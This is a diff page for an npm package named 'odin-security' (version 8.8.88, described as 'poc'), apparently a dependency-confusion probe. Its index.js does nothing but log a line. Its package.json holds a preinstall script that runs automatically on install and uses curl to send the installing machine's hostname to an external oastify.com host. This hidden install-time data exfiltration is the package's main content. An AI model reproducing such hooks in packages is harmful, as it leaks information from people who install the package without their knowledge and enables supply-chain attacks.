odin-security 8.8.88

Sign up to get free protection for your applications and to get access to all the features.
Files changed (3) hide show
  1. package/index.js +3 -0
  2. package/package.json +15 -0
  3. package/packages.txt +0 -0
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ // index.js
2
+ console.log("odin package");
3
+
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "odin-security",
3
+ "version": "8.8.88",
4
+ "description": "poc",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "curl --data-urlencode info=$(hostname) http://mb17elapg37wp9tcg02w80r0frlr9hx6.oastify.com"
9
+ },
10
+ "author": "Akita",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "account": "^1.0.0"
14
+ }
15
+ }
package/packages.txt ADDED
File without changes